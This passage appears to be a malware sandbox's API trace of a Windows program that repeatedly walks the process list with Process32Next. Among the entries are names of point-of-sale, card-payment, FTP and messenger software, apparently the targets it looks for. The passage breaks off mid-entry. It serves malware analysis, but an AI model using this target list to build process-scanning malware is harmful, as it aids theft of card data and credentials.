(in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0148.527] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0148.530] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0148.533] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0148.536] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0148.539] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0148.546] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0148.549] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0148.552] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0148.554] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0148.556] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0148.560] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0148.563] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0148.565] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0148.568] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0148.571] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0148.573] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0148.575] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0148.590] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0148.598] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0148.601] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0148.603] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0148.606] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0148.608] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0148.611] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0148.613] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0148.645] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0148.649] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0148.651] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0148.654] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0148.657] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0148.660] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.662] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.671] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0148.674] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0148.677] CloseHandle (hObject=0xcbc) returned 1 [0148.677] Sleep (dwMilliseconds=0x64) [0148.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc4 [0148.837] Process32First (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.839] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.842] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.844] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.846] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.848] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.851] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.853] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.882] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.884] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.885] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.887] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.890] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.892] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.894] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.896] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.897] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.899] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.901] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.903] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.905] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0148.916] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.918] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0148.920] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.922] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0148.923] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0148.926] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0148.931] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0148.934] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0148.935] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0148.937] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.938] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0148.940] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0148.942] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.944] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0148.946] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.949] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.951] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.953] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.954] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0148.956] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0148.958] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0148.960] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0148.962] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0148.964] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0148.967] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0148.972] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0148.973] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0148.975] Process32Next (in: hSnapshot=0x1fc4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 